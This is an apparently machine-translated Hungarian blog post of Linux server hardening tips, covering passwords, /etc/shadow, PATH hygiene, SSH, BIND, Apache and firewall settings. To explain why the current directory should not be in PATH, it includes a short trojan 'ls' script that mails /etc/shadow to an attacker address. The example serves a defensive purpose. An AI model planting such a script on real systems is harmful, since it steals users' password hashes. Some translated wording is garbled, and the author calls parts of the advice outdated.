Biztonsági tippek a Linux (kiszolgáló) számára (1. rész)

@Jlcmux

5 perc

Régóta nem tettem közzé semmit a blogon, és szeretnék megosztani néhány tippet egy könyvből, amely (többek között). Megtaláltam az egyetemen, és most olvastam, és bár őszintén szólva kissé elavult, és a bemutatott technikák a rendszer evolúciójára való tekintettel nem valószínű, hogy működni fognak, érdekes szempontok is, amelyek bemutathatók. 9788448140502

Szeretném tisztázni, hogy ezek tanácsok egy Linux rendszerhez, amelyet kiszolgálóként használnak, közepes vagy talán nagy léptékben, mivel asztali felhasználói szinten ugyan alkalmazhatók, de nem lennének nagyon hasznosak.

Figyelmeztetem továbbá, hogy egyszerű gyors tippek, és nem részletezem részletesen, bár azt tervezem, hogy egy másik, sokkal konkrétabb és átfogóbb bejegyzést készítek egy adott témáról. De ezt később meglátom. Kezdjük el.

Jelszó irányelvek. 

Noha ez jelszónak tűnik, a jó jelszó-irányelvek különbséget tesznek a sérülékeny rendszerek között, vagy sem. Az olyan támadások, mint a "durva erő", kihasználják a rossz jelszó használatát a rendszer eléréséhez. A leggyakoribb tippek:

  • Kombinálja a kis- és nagybetűket.
  • Használjon speciális karaktereket.
  • Számok.
  • Több mint 6 számjegy (remélhetőleg több mint 8).

Ezen felül vegyünk figyelembe két lényeges fájlt.  / etc / passwd és / etc / shadow.

Valami nagyon fontos, hogy a fájl / etc / passwd. Amellett, hogy megadta a felhasználó nevét, felhasználói azonosítóját, mappájának elérési útját, bash stb. egyes esetekben a felhasználó titkosított kulcsát is megjeleníti.

 Nézzük meg a tipikus összetételét.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

felhasználó: cryptkey: uid: gid: elérési út: elérési út: bash

Az igazi probléma itt az, hogy ennek a fájlnak engedélyei vannak -rw-r - r– ami azt jelenti, hogy olvasási engedélyekkel rendelkezik a rendszer bármely felhasználója számára. és a titkosított kulcs birtoklása nem túl nehéz megfejteni a valódit.

Ezért létezik a fájl / etc / shadow. Ebben a fájlban tárolják többek között az összes felhasználói kulcsot. Ez a fájl rendelkezik a szükséges engedélyekkel, így egyetlen felhasználó sem olvashatja el.

Ennek kijavításához el kell mennünk a fájlba / Etc / passwd és változtassa meg a titkosított kulcsot "x" -re, ettől a kulcs csak a fájlunkba kerül / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Problémák a PATH-val, a .bashrc és másokkal.

Amikor a felhasználó végrehajt egy parancsot a konzolján, a shell a parancsot a PATH környezeti változóban található könyvtárak listáján keresi.

Ha beírja a konzolba az "echo $ PATH" szót, akkor valami ilyesmit fog kiadni.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Ezeknek a mappáknak az a helye, ahol a shell megkeresi a végrehajtáshoz írt parancsot. Ő "". ez azt jelenti, hogy az első keresett mappa ugyanaz a mappa, ahonnan a parancsot végrehajtják.

Tegyük fel, hogy van egy felhasználó "Carlos", és ez a felhasználó "rosszat akar tenni". Ez a felhasználó hagyhat egy "ls" nevű fájlt a fő mappájában, és ebben a fájlban hajthat végre egy parancsot, például:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

És ha a rendeltetési hely gyökérfelhasználója megpróbálja felsorolni a mappákat a carlos mappában (mivel először a parancsot keresi ugyanabban a mappában, véletlenül a jelszavakkal ellátott fájlt küldené erre az e-mailre, majd a mappák megjelennek és csak későn tudná meg.

Ennek elkerülése érdekében meg kell szüntetnünk a "." a PATH változó értéke.

Ugyanígy ellenőrizni kell az olyan fájlokat, mint a /.bashrc, /.bashrc_profile, ./.login, és ellenőrizni kell, hogy nincs-e "". a PATH változóban, és valójában az ehhez hasonló fájlokból megváltoztathatja egy adott parancs célját.

Tippek szolgáltatásokkal:

SHH

  • Tiltsa le az ss protokoll 1. verzióját az sshd_config fájlban.
  • Ne engedje, hogy a root felhasználó belépjen az ssh segítségével.
  • Az ssh_host_key, ssh_host_dsa_key és ssh_host_rsa_key fájlokat és mappákat csak a root felhasználó olvassa el.

BIND

  • Módosítsa az üdvözlő üzenetet a named.conf fájlban úgy, hogy az ne jelenítse meg a verziószámot
  • Korlátozza a zónaátadásokat, és csak azoknak a csapatoknak engedélyezze, amelyeknek szüksége van rá.

Apache

  • Akadályozza meg, hogy a szolgáltatás megjelenítse az Ön verzióját az üdvözlő üzenetben. Szerkessze a httpd.conf fájlt, és adja hozzá vagy módosítsa a sorokat:  

ServerSignature Off
ServerTokens Prod

  • Tiltsa le az automatikus indexelést
  • Állítsa be az apache-t, hogy ne jelenjen meg olyan érzékeny fájlok, mint a .htacces, * .inc, * .jsp .. stb
  • Távolítsa el a man oldalakat vagy a mintát a szolgáltatásból
  • Futtassa az apache rendezett környezetben

Hálózati biztonság.

Alapvető fontosságú, hogy lefedje a rendszer összes lehetséges bejáratát a külső hálózatból, íme néhány alapvető tipp, hogy megakadályozzuk a behatolókat abban, hogy beolvassák és információkat szerezzenek a hálózattól.

Blokkolja az ICMP forgalmat

A tűzfalat úgy kell beállítani, hogy blokkolja a bejövő és kimenő ICMP forgalom és visszhangvisszajelzések minden típusát. Ezzel elkerülheti, hogy például egy olyan szkenner, amely élő eszközöket keres az ip tartományában, megkeresse Önt. 

Kerülje a TCP ping-vizsgálatát.

A rendszer vizsgálatának egyik módja a TCP ping-vizsgálat. Tegyük fel, hogy a szerveren van egy Apache szerver a 80-as porton. A behatoló ACK kérést küldhet arra a portra, ezzel ha a rendszer válaszol, a számítógép életben lesz, és a többi portot átvizsgálja.

Ehhez a tűzfalnak mindig rendelkeznie kell az "államtudat" lehetőséggel, és el kell dobnia az összes ACK-csomagot, amelyek nem felelnek meg egy már létrehozott TCP-kapcsolatnak vagy munkamenetnek.

Néhány további tipp:

  • Az IDS-rendszerek segítségével észlelheti a hálózatra irányuló portolvasásokat.
  • Konfigurálja a tűzfalat úgy, hogy ne bízzon a csatlakozási forrás portjának beállításaiban.

Ez azért van, mert egyes vizsgálatok "hamis" forrásportot használnak, például 20-at vagy 53-at, mivel sok rendszer megbízik ezekben a portokban, mert jellemzőek az ftp-re vagy a DNS-re.

Megjegyzés: Ne feledje, hogy az ebben a bejegyzésben jelzett legtöbb probléma már szinte az összes jelenlegi disztribúcióban megoldódott. De soha nem árt kulcsfontosságú információkkal rendelkezni ezekről a problémákról, hogy ne történjenek veled.

Megjegyzés: Később meglátok egy konkrét témát, és elkészítek egy bejegyzést sokkal részletesebb és aktuálisabb információkkal.

Thaks mindenkit az olvasásért.

Üdvözlet.


Hagyja megjegyzését

E-mail címed nem kerül nyilvánosságra. Kötelező mezők vannak jelölve *

*

*

  1. Az adatokért felelős: Miguel Ángel Gatón
  2. Az adatok célja: A SPAM ellenőrzése, a megjegyzések kezelése.
  3. Legitimáció: Az Ön beleegyezése
  4. Az adatok közlése: Az adatokat csak jogi kötelezettség alapján továbbítjuk harmadik felekkel.
  5. Adattárolás: Az Occentus Networks (EU) által üzemeltetett adatbázis
  6. Jogok: Bármikor korlátozhatja, helyreállíthatja és törölheti adatait.

  1.   informatikai dijo
    ezelőtt 8 év

    Nagyon tetszett a cikk, és érdekel a téma, javasolom, hogy folytassa a tartalom feltöltését.

    Válasz az informatico címre